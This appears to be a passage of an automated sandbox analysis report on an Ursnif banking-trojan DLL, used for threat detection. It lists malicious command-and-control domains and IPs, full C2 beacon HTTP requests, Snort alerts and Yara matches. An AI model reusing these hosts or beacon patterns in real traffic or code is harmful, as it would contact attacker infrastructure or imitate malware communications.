Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02E347E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,	4_2_02E347E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_045E47E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,	5_2_045E47E5

Source: ursnif_IAT_corrected.exe.dll

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 62.173.145.183 80	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Domain query: onlinetwork.top
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 31.41.44.194 80	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Domain query: linetwork.top

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49711 -> 13.107.42.16:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49711 -> 13.107.42.16:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49715 -> 13.107.42.16:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49718 -> 13.107.42.16:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49719 -> 13.107.42.16:80
Source: Traffic	Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.4:59444 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.4:58914 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49742 -> 62.173.145.183:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49742 -> 62.173.145.183:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49743 -> 62.173.145.183:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49743 -> 62.173.145.183:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49744 -> 62.173.145.183:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49744 -> 62.173.145.183:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49745 -> 62.173.145.183:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49746 -> 13.107.42.16:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49747 -> 13.107.42.16:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49747 -> 13.107.42.16:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49748 -> 13.107.42.16:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49748 -> 13.107.42.16:80

Source: Joe Sandbox View	ASN Name: SPACENET-ASInternetServiceProviderRU SPACENET-ASInternetServiceProviderRU
Source: Joe Sandbox View	ASN Name: ASRELINKRU ASRELINKRU

Source: global traffic	HTTP traffic detected: GET /drew/fJ29sqPsP/PB4FnwvByjBglXFYEjZ1/hXe9prWt3B5GwuDq98v/uxK6HJV9Vv2hGb4_2BzE87/_2B7cwHJr4KZl/Z2JNy_2F/FQTy6SE98GzpaP4OycRAbeK/FNb75e_2BZ/vDSt33A5GpRAp0Wp5/3sRCo7L7mC_2/FRcDNZgk7ge/0DV7I1SHotZIJK/MawMR4TykLq9DH4qoWZqU/9lh5zRf0UXFuxlAr/44doOlzEgahzUed/pTo7pwfqznm_2FNsdD/ONqwlJdhn/hTW0RFx_2FoxngXj4_2B/7VTtckioJ/RQjhyCJh.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: linetwork.topConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/bBjIYvLPS6LWM/5hSIaVH5/Wq734Z_2BJdIJMJo3F9GITO/_2FcMitcTe/kWvqzZ_2B_2FKKbPA/PasXIoBqTiXU/g_2FlZW7Y_2/B41HTf6QrjFt_2/BVrbTt4PzlSq49i2n_2Bd/eYvDRtuGLt_2Fv6B/tiuwwj_2BAQltrY/i8qwn6NTmmAuX65G3U/G0pEw9pKd/5FnOrAI7ls4u0lmSvnEp/39rOvZP_2BCYyBu8UVC/tWjDwJwf88LN44CDcCSZK_/2BvPg5_2BjQiD/eLQzVCVR/WPugjRuufv7WeRl3hdeCsRv/aT5ChRiLQy/6L.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: linetwork.topConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/NXo6zedpn_2B_/2BcanAQX/FnyJMATt_2F48kv6_2FGokp/FknJiZ4BPO/rcHYyBUZQ99j1sGoQ/3iqH_2FJ2MwI/44xXh3ewHre/Z3uYW8oE7cSgpQ/KoDoLpaNqGjAzcl7PDDtU/W4U8yO0BLXfpg6Fg/1LkQrB_2FwF36_2/F24Alce0F3ZIABc8fP/582wfkRmY/YYSggLyv6WiREP5aRpD7/BrtAiO3VnPYflPLClgV/qChVx2f_2BaPtkYL4DoePx/ugW_2FeHancyO/tXrlnouq/Hh9J5BBA0FEI0HWw67W05n9/zd1N.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: linetwork.topConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/cLUzScwIGd6lPZFBgwJAB/boGs7r3rpKnEEW26/IZwhyzcbrBr1vrh/pacdkNsvfXz_2BJd7M/nIUnH5UJy/lraLufWTWWuSthVJSQnB/skwB6_2F4mYx1hncPnC/DX7TcGWo1RJRVk4zslIVLg/yTztrtFucPEpP/M0MfTI80/ZOv2XL0MhanRoGMyGX9uAoo/dmIzHKJR6c/gnzW6jLfOR7yWUymL/vvx15g4IZ4jD/aDLfgoeX_2F/HE40tKUB0xmnED/5US9_2FwaFREdIsGRoa7p/JuiKle06sqYmlLWx/l.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: linetwork.topConnection: Keep-AliveCache-Control: no-cache

Source: rundll32.exe, 00000004.00000003.608109363.0000000002E94000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817171123.0000000002E95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://config.ed4
Source: rundll32.exe, 00000004.00000003.608109363.0000000002E94000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817171123.0000000002E95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://config.edge.skype
Source: rundll32.exe, 00000004.00000002.817297362.0000000002EC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://config.edge.skype.com/
Source: regsvr32.exe, 00000003.00000002.817169854.0000000002B81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://config.edge.skype.com/drew/PS2yhImkf/WUfx3th5Boa7ltUMwMtx/yWw24ht9TmQzrZJd3f7/J6v0UwdZxUlWdBE
Source: regsvr32.exe, 00000003.00000003.615051454.0000000002B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://config.edge.skype.com/drew/m7TsF_2BzBjOID/ubqoU4I8FDNox2Pjk9c8A/V6pB6NWoxVj8rIbr/Z2mudDVWbTE4
Source: rundll32.exe, 00000004.00000002.817171123.0000000002E95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://config.edge.skype.com/drew/uMeu18bcwP4rXMlifz6Q2/6Hy8MUrv67vFVnMI/nOHGGP0ADwhulYb/27ZJOLUh406
Source: rundll32.exe, 00000004.00000002.817212768.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://config.edge.skype.com/drew/xnjpjMCMe2_2BcaLBxlal/IEyR7r9yGjIMn5iD/iXB1XVZ1XOEDbhK/s9wDAd9rC3K
Source: rundll32.exe, 00000004.00000002.817212768.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://config.edge.skype.com/p
Source: rundll32.exe, 00000004.00000003.608125586.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817212768.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817112343.0000000002E76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://linetwork.top/
Source: rundll32.exe, 00000004.00000003.608139585.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://linetwork.top/7
Source: rundll32.exe, 00000004.00000003.608109363.0000000002E94000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817171123.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817003382.0000000002E40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://linetwork.top/drew/NXo6zedpn_2B_/2BcanAQX/FnyJMATt_2F48kv6_2FGokp/FknJiZ4BPO/rcHYyBUZQ99j1sGo
Source: regsvr32.exe, 00000003.00000003.615051454.0000000002B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://linetwork.top/drew/cLUzScwIGd6lPZFBgwJAB/boGs7r3rpKnEEW26/IZwhyzcbrBr1vrh/pacdkNsvfXz_2BJd7M/
Source: regsvr32.exe, 00000003.00000003.615119181.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.817169854.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.608125586.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817212768.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://onlinetwork.top/
Source: regsvr32.exe, 00000003.00000003.615119181.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.817169854.0000000002B81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://onlinetwork.top/)
Source: rundll32.exe, 00000004.00000003.608125586.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817212768.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://onlinetwork.top/M
Source: rundll32.exe, 00000004.00000002.817262107.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.608139585.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.608125586.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817212768.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://onlinetwork.top/drew/fkPc2r0gVHV/J_2FZDZ2sHG5ME/g7AZzNZ7pG5EAQpQ0yMPw/2o1hBcleFqeXJ_2F/_2BIHR
Source: rundll32.exe, 00000004.00000002.817078743.0000000002E65000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817003382.0000000002E40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://onlinetwork.top/drew/pkd6zgqwUDZasB/ZfiTcB208ordqnfSoXwRp/L_2FtDxOUhf3arTi/7kXxmpxOwIKTj9W/FF
Source: regsvr32.exe, 00000003.00000003.615119181.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.817106892.0000000002B59000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.817169854.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.615051454.0000000002B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://onlinetwork.top/drew/rlvNc0Gi62Z2w3Lq/XhEo009f5SrCecB/UqNEgSpKb_2FxSk3FP/SwVmULm50/faoxFounD5
Source: regsvr32.exe, 00000003.00000002.817169854.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.816986286.0000000002B1A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://onlinetwork.top/drew/u5bDuKFkXxAro/J7u_2BcQ/WcM5Uj0RwbHtvwyTUfix6_2/BcSLCk9FBn/ntIlUfYV61xDv7
Source: rundll32.exe, 00000005.00000002.817185971.0000000002E0C000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://onlinetwork.top/drew/wmWOP2SQu9/lkwlizEoFo7LtzQm_/2FQKnjOJS7Fs/1omPLrC4w2x/K

Source: unknown

DNS traffic detected: queries for: onlinetwork.top

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_02AF4F4B ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,

3_2_02AF4F4B

Source: global traffic	HTTP traffic detected: GET /drew/fJ29sqPsP/PB4FnwvByjBglXFYEjZ1/hXe9prWt3B5GwuDq98v/uxK6HJV9Vv2hGb4_2BzE87/_2B7cwHJr4KZl/Z2JNy_2F/FQTy6SE98GzpaP4OycRAbeK/FNb75e_2BZ/vDSt33A5GpRAp0Wp5/3sRCo7L7mC_2/FRcDNZgk7ge/0DV7I1SHotZIJK/MawMR4TykLq9DH4qoWZqU/9lh5zRf0UXFuxlAr/44doOlzEgahzUed/pTo7pwfqznm_2FNsdD/ONqwlJdhn/hTW0RFx_2FoxngXj4_2B/7VTtckioJ/RQjhyCJh.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: linetwork.topConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/bBjIYvLPS6LWM/5hSIaVH5/Wq734Z_2BJdIJMJo3F9GITO/_2FcMitcTe/kWvqzZ_2B_2FKKbPA/PasXIoBqTiXU/g_2FlZW7Y_2/B41HTf6QrjFt_2/BVrbTt4PzlSq49i2n_2Bd/eYvDRtuGLt_2Fv6B/tiuwwj_2BAQltrY/i8qwn6NTmmAuX65G3U/G0pEw9pKd/5FnOrAI7ls4u0lmSvnEp/39rOvZP_2BCYyBu8UVC/tWjDwJwf88LN44CDcCSZK_/2BvPg5_2BjQiD/eLQzVCVR/WPugjRuufv7WeRl3hdeCsRv/aT5ChRiLQy/6L.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: linetwork.topConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/NXo6zedpn_2B_/2BcanAQX/FnyJMATt_2F48kv6_2FGokp/FknJiZ4BPO/rcHYyBUZQ99j1sGoQ/3iqH_2FJ2MwI/44xXh3ewHre/Z3uYW8oE7cSgpQ/KoDoLpaNqGjAzcl7PDDtU/W4U8yO0BLXfpg6Fg/1LkQrB_2FwF36_2/F24Alce0F3ZIABc8fP/582wfkRmY/YYSggLyv6WiREP5aRpD7/BrtAiO3VnPYflPLClgV/qChVx2f_2BaPtkYL4DoePx/ugW_2FeHancyO/tXrlnouq/Hh9J5BBA0FEI0HWw67W05n9/zd1N.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: linetwork.topConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/cLUzScwIGd6lPZFBgwJAB/boGs7r3rpKnEEW26/IZwhyzcbrBr1vrh/pacdkNsvfXz_2BJd7M/nIUnH5UJy/lraLufWTWWuSthVJSQnB/skwB6_2F4mYx1hncPnC/DX7TcGWo1RJRVk4zslIVLg/yTztrtFucPEpP/M0MfTI80/ZOv2XL0MhanRoGMyGX9uAoo/dmIzHKJR6c/gnzW6jLfOR7yWUymL/vvx15g4IZ4jD/aDLfgoeX_2F/HE40tKUB0xmnED/5US9_2FwaFREdIsGRoa7p/JuiKle06sqYmlLWx/l.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: linetwork.topConnection: Keep-AliveCache-Control: no-cache

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322255740.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322346163.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347438026.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347208366.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322130590.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343566603.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343497649.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347419865.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322318617.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343438473.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.354124347.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.353972705.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347302093.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.817516370.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347451141.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343171916.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.354053342.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343329790.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.354175000.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322083374.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.354150298.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343470122.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322212571.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.353919364.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.817541038.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343551363.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347355624.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.817517384.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322029776.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.817470285.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343230461.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322295341.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.354013304.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347162073.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 4124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5020, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 780, type: MEMORYSTR
Source: Yara match	File source: ursnif_IAT_corrected.exe.dll, type: SAMPLE
Source: Yara match	File source: 0.2.loaddll32.exe.13794a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.4a494a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.49b94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4b094a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2e30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.7f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.45e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.2af0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.817394092.0000000001379000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.817370838.0000000004B09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.817337923.00000000049B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.817437989.0000000004A49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

E-Banking Fraud

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322255740.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322346163.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347438026.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347208366.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322130590.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343566603.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343497649.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347419865.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322318617.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343438473.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.354124347.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.353972705.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347302093.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.817516370.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347451141.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343171916.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.354053342.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343329790.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.354175000.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322083374.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.354150298.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343470122.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322212571.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.353919364.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.817541038.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343551363.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347355624.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.817517384.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322029776.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.817470285.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343230461.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322295341.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.354013304.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347162073.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 4124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5020, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 780, type: MEMORYSTR
Source: Yara match	File source: ursnif_IAT_corrected.exe.dll, type: SAMPLE
Source: Yara match	File source: 0.2.loaddll32.exe.13794a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.4a494a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.49b94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4b094a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2e30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.7f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.45e0000.0.unpack, type: UNPACKEDPE
